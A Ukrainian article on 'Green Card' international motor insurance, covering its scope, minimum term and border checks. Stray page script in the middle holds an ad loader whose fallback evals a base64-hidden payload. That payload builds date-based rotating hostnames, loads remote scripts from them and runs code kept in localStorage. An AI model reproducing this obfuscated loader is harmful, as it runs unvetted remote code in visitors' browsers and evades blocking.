Що таке «Зелена карта» та коли вам не обійтися без цього документа

Грін-карта є міжнародним страховим сертифікатом та аналогом української автоцивілки. Так само як у всіх автовласників в Україні повинен бути дійсний поліс ОСЦПВ, при виїзді за кордон до більшості європейських та деяких азійських країн необхідно мати цю страховку. Особливістю «Зеленої карти» є єдиний загальноприйнятий формат документа, який є уніфікованим. Завдяки цьому зі вмістом поліса можуть ознайомитися працівники відповідних правоохоронних органів будь-якої країни.

Грін карта на автомобіль покриває відповідальність її власника перед третіми особами, яким може бути завдано шкоди автоводієм. Отже, у тому разі, якщо ви скоїли ДТП під час закордонної подорожі на машині, збитки покриватиме українська страхова компанія. Українська автоцивілка не діє за межами нашої країни з кількох причин:

по-перше, через невідповідність розмірів страхового відшкодування. За українськими правовими нормами граничний рівень компенсації постраждалій стороні суттєво менший у порівнянні з закордонними. Через це поліс ОСЦПВ коштує дешевше;по-друге, через різні форми документів. Грін-карта складається на особливих бланках встановленої форми. У договорі зазначається, у яких країнах надається страховий захист, період його дії, номер тощо, а сам він заповнюється англійською мовою.

Важлива відмінність «Зеленої карти» та автоцивілки також полягає в тому, що перша може видаватися на значно менший термін часу. Мінімальний строк дії документа становить 15 днів. Вам зовсім не обов’язково купувати піврічний чи річний поліс для того, щоб виїхати за кордон лише на декілька тижнів. Це дозволяє суттєво заощадити, особливо за тих обставин, що міжнародне страхування коштує дорожче. Якщо ж термін дії договору закінчився, а вам потрібно затриматися за кордоном за будь-яких обставин, можна оформити новий документ онлайн.

Проте варто звернути увагу на те, що ви не матимете змоги перетнути державний кордон до 00:00 дня, з якого починає діяти поліс. Саме тому важливо розрахувати дату початку закордонної подорожі та правильно оформити документи. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Цікаво, що грін-карта зовсім не повинна бути зеленою, як про це можна подумати, судячи з назви. Колись цей документ друкували саме на зелених бланках, проте зараз він має будь-який колір та розмір. Тож ви можете купити страховку онлайн та за бажанням самостійно роздрукувати її на папері або ж надавати електронну версію документа для перевірки органами контролю.

Коли перевіряється наявність документа

Грін-карта потрібна при виїзді за межі державного кордону в тому випадку, якщо автомобіль має українську реєстрацію. Термін перебування в іншій країні при цьому не має значення – навіть у тому разі, якщо ви їдете за покупками до найближчого до кордону міста, потрібно мати документ. Отже, власники транспортних засобів з іноземними номерними знаками також повинні придбати міжнародний страховий поліс на час перебування в Україні. Документи зазвичай перевіряються на кордоні. Попри відсутність меж між державами в ЄС, поліціянти будь-якої країни мають право зупинити автомобіль та перевірити наявність дійсного страхового поліса.

Якщо ви плануєте закордонну подорож із причепом чи трейлером, варто дізнатися, чи не вимагається для них наявність додаткової грін-карти в країні, до якої ви прямуєте. Наприклад, у Німеччини, Польщі чи Іспанії такі транспортні засоби вагою понад 750 кг повинні бути застраховані окремо та мати власний реєстраційний номер. Будьте уважні, адже «Зелена карта» є обов’язковим документом, через відсутність якого до власника транспортного засобу може застосовуватися покарання. У країнах Європи штрафи є суттєво вищими в порівнянні з ціною вчасно оформленого документа. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/shho-take-zelena-karta-ta-koli-vam-ne-obijtisya-bez-tsogo-dokumenta/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top